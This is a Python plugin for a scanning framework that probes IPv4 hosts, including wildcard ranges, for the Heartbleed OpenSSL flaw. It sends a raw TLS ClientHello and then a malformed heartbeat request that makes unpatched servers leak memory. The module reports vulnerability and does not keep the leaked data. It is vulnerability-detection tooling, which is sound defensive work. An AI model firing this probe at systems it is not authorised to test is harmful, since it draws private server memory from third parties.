# Module author credit.  The two literals are joined by implicit string
# concatenation, so the first one carries the separator.
__author__ = 'asim jaweesh from owasp khartoum @asim_jaweesh; ' \
             'this is an ugly port, original hb code author disclaims copyright to this source code'

# The original author disclaims copyright to this source code.

import shlex
import signal
import socket
from datetime import datetime
import multiprocessing as multip
import errno
import struct
import time
import select



# heartbleed part



def h2bin(x):
    """Convert a whitespace-formatted hex string into the raw bytes it spells out.

    Spaces and newlines are removed first, so the multi-line hex literals in
    this module can be laid out for readability.  ``binascii.unhexlify``
    returns the same value as the Python-2-only ``str.decode('hex')`` codec
    (a ``str`` on Python 2) and also works on Python 3, where it returns
    ``bytes``.  Odd-length or non-hex input raises (``TypeError`` on
    Python 2, ``binascii.Error`` on Python 3).
    """
    import binascii
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))


# TLS ClientHello sent first to open the handshake.  Record header
# "16 03 02 00 dc": content type 0x16 (handshake), version 0x0302 (TLS 1.1),
# 0xdc = 220 bytes of body; the body starts "01 00 00 d8" (handshake type 1,
# ClientHello, 0xd8 = 216 bytes).  The final extension, "00 0f 00 01 01", is
# the Heartbeat extension (RFC 6520, type 0x000f, mode 1 =
# peer_allowed_to_send).  The bytes must stay exactly as written.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Malformed heartbeat probe.  Record header "18 03 02 00 03": content type
# 0x18 = 24 (heartbeat), TLS 1.1, 3-byte body.  The body "01 40 00" is a
# heartbeat_request (01) that claims a payload_length of 0x4000 (16384)
# bytes but carries no payload.  An unpatched OpenSSL replies with memory
# beyond the request (CVE-2014-0160); hit_hb() treats any reply payload
# longer than 3 bytes as a sign of that.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')


def hexdump(s):
    """Print *s* as a hex dump, 16 characters per row, then a blank line.

    Each row shows the offset as 4 hex digits, the characters' codes as
    upper-case hex left-justified in 48 columns, and a text column where
    codes 32..126 are shown as-is and everything else as '.'.
    """
    width = 16
    offset = 0
    while offset < len(s):
        row = s[offset:offset + width]
        hex_part = ' '.join(['%02X' % ord(ch) for ch in row])
        text_part = ''.join([ch if 32 <= ord(ch) <= 126 else '.' for ch in row])
        print('  %04x: %-48s %s' % (offset, hex_part, text_part))
        offset += width
    print('')


def recvall(s, length, timeout=5):
    """Read exactly *length* bytes from socket *s*.

    :param s: connected socket.
    :param length: number of bytes to read.
    :param timeout: overall deadline in seconds for the whole read (not per
        ``recv`` call).
    :returns: the bytes read, or None if the peer closed the connection or
        the deadline passed before *length* bytes arrived.
    """
    deadline = time.time() + timeout
    chunks = []
    remain = length
    while remain > 0:
        rtime = deadline - time.time()
        if rtime <= 0:
            return None
        # Wait only for what is left of the overall deadline; a fixed wait
        # here would let a single call overshoot ``timeout``.
        readable, _, _ = select.select([s], [], [], rtime)
        if s in readable:
            data = s.recv(remain)
            if not data:  # EOF: peer closed before sending everything
                return None
            chunks.append(data)
            remain -= len(data)
    # Collect chunks and join once instead of repeated string concatenation.
    return b''.join(chunks)


def recvmsg(s):
    """Read one TLS record from socket *s*.

    The 5-byte record header is unpacked big-endian as (content type: 1 byte,
    protocol version: 2 bytes, body length: 2 bytes); the body is then read
    with a 10-second deadline.

    :returns: ``(content_type, version, payload)``, or ``(None, None, None)``
        if either read comes back incomplete (``recvall`` returned None).
    """
    header = recvall(s, 5)
    if header is not None:
        content_type, version, body_len = struct.unpack('>BHH', header)
        payload = recvall(s, body_len, 10)
        if payload is not None:
            return content_type, version, payload
    return None, None, None


def hit_hb(s):
    """Send the malformed heartbeat ``hb`` on *s* and report how the server reacts.

    Reads records until one of them settles the outcome:

    * nothing received (``recvmsg`` gave None) -> prints a message, returns False;
    * an alert record (type 21) -> prints a message, returns False;
    * a heartbeat record (type 24) -> prints whether its payload is longer than
      3 bytes, returns True either way.

    Records of any other type are skipped and the next one is read.
    """
    s.send(hb)
    while True:
        content_type, _version, payload = recvmsg(s)
        if content_type is None:
            print('No heartbeat response received, server likely not vulnerable')
            return False
        if content_type == 21:
            print('Server returned error, likely not vulnerable')
            return False
        if content_type != 24:
            continue
        if len(payload) > 3:
            print('server returned more data than it should - server is vulnerable!')
        else:
            print('Server processed malformed heartbeat, but did not return any extra data.')
        return True


###########################

# Host application object.  It is None here; presumably the plugin framework
# assigns it before do_scan() runs (NOTE(review): confirm with the loader).
# Code in this module uses app.print_line(), app.db.get_session(),
# app.db.Host.add() and app.db.Port.add().
app = None

# Plugin options; not referenced by any code in this module as shown.
options = {}


def _scan(ipaddr, port=443, timeout=10):
    """Probe one host for Heartbleed and record the result through ``app``.

    Connects to ``ipaddr:port``, sends the ClientHello in ``hello`` and, once
    a TLS record comes back, lets ``hit_hb`` send the malformed heartbeat and
    print its verdict.

    - After the probe, the host is logged as OPEN and stored via
      ``app.db.Host.add`` / ``app.db.Port.add`` with status 'open'.
    - An ``IOError`` other than EINTR is logged as ERROR and stored with the
      exception text as the port status.

    :param ipaddr: IPv4 address to probe.
    :param port: TCP port to connect to.
    :param timeout: seconds allowed for each blocking socket operation, so a
        filtered or silent host cannot tie up a pool worker indefinitely.
    """
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ipaddr, port))
        s.sendall(hello)
        typ, _, _ = recvmsg(s)
        if typ is None:
            print('Server closed connection without sending Server Hello.')
            return
        # The server answered the ClientHello, so probe it.  hit_hb() sends
        # the heartbeat request itself; it must not also be sent here.
        # NOTE(review): hit_hb()'s verdict is only printed, not stored in the db.
        hit_hb(s)

        app.print_line("%s | %s | %d | OPEN" % (datetime.now(), ipaddr, port))
        app.db.Host.add(app.db.get_session(), hostip=ipaddr, hostname='')
        app.db.Port.add(app.db.get_session(), protocol='TCP', port_number=port, status='open', hostid=ipaddr)
    except IOError as ex:
        # EINTR means the call was interrupted by a signal rather than failing.
        if ex.errno != errno.EINTR:
            app.print_line("%s | %s | %d | ERROR | %r" % (datetime.now(), ipaddr, port, str(ex)))
            app.db.Host.add(app.db.get_session(), hostip=ipaddr, hostname='')
            # Record the actual error text as the port status.
            app.db.Port.add(app.db.get_session(), protocol='TCP', port_number=port, status=str(ex), hostid=ipaddr)
    finally:
        if s is not None:
            try:
                s.shutdown(socket.SHUT_WR)
            except IOError:
                pass  # best effort: the socket may never have connected
            finally:
                s.close()


def _init_worker(*_):
    """Pool initializer: make workers ignore SIGINT so Ctrl-C is handled by the parent."""
    signal.signal(signal.SIGINT, signal.SIG_IGN)


def _iter_targets(octets):
    """Yield every dotted-quad address described by *octets*, in ascending order.

    *octets* is a 4-item sequence of strings, each a decimal octet or 'x'
    meaning "every value 0-255 in this position".
    """
    import itertools
    choices = [range(256) if octet == 'x' else (int(octet),) for octet in octets]
    for quad in itertools.product(*choices):
        yield '%d.%d.%d.%d' % quad


def do_scan(args):
    """Scan an IPv4 address, or an 'x'-wildcard range of them, for Heartbleed.

    *args* is ``"<ip> [port]"``.  Any octet of ``<ip>`` may be ``x`` to sweep
    0-255 in that position (e.g. ``10.0.0.x``).  The port defaults to 443.
    Every address is handed to ``_scan`` on a pool of 5 worker processes.

    :returns: -1 if *args* cannot be parsed, otherwise None.
    :raises: re-raises any exception propagated from a worker, after the
        pool has been terminated.
    """
    try:
        fields = shlex.split(args.strip().lower())
    except ValueError as ex:  # e.g. an unbalanced quote
        app.print_line("Error: %s" % ex)
        return -1
    if not fields:
        app.print_line("Error: ip address expected")
        return -1
    ps = fields[0].strip().lower().split('.')
    if len(ps) != 4 or not all(((p.isdigit() and 0 <= int(p) < 256) or p == 'x') for p in ps):
        app.print_line("Error: invalid IPv4 address %r" % fields[0])
        return -1
    if len(fields) > 1:
        port = fields[1]
        # isdigit() is checked first so int() never sees non-numeric text;
        # anything outside 1-65535 is rejected rather than passed to connect().
        if not (port.isdigit() and 0 < int(port) < 65536):
            app.print_line("Error: invalid port %r" % port)
            return -1
        port = int(port)
    else:
        # Heartbleed is a TLS bug: default to HTTPS (matching _scan's default)
        # rather than plain-HTTP port 80.
        port = 443

    # A timed get() stays interruptible by Ctrl-C on Python 2, where an
    # untimed wait ignores KeyboardInterrupt.  0xFFFF s is far longer than
    # any single _scan call can take.
    wait_secs = 0xFFFF
    pool = multip.Pool(processes=5, initializer=_init_worker)
    try:
        jobs = [pool.apply_async(_scan, (ipaddr, port)) for ipaddr in _iter_targets(ps)]
        for job in jobs:
            job.get(wait_secs)
    except KeyboardInterrupt:
        pool.terminate()
        pool.join()
    except Exception:
        # A worker raised (get() re-raises it here): tear the pool down
        # instead of leaving its processes behind, then propagate.
        pool.terminate()
        pool.join()
        raise
    else:
        pool.close()
        pool.join()
